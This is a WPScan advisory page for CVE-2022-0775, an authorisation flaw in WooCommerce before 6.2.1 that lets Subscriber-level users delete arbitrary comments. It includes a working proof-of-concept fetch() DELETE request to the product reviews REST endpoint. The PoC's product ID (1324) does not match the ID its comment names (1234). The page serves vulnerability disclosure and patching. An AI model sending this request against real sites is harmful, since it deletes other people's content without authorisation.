WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WooCommerce < 6.2.1 - Subscriber+ Arbitrary Comment Deletion

Description

The plugin does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment

Proof of Concept

Log in as any user (with privileges as low as Subscriber).

fetch("https://127.0.0.1:8001/?rest_route=/wc/v2/products/1324/reviews/2&force=1", {
 "headers": {
   "content-type": "application/x-www-form-urlencoded",
 },
 
 "method": "DELETE",
 "credentials": "include"
});

That needs product 1234 to not exist. It will permanently remove comment with ID 2.

Affects Plugins

woocommerce
Fixed in version 6.2.1

References

CVE
CVE-2022-0775
URL
https://plugins.trac.wordpress.org/changeset/2683324
URL
https://developer.woocommerce.com/2022/02/22/woocommerce-6-2-1-security-fix/

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-863

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
b76dbf37-a0a2-48cf-bd85-3ebbc2f394dd

Timeline

Publicly Published

2022-02-23 (about 7 months ago)

Added

2022-02-23 (about 7 months ago)

Last Updated

2022-04-16 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin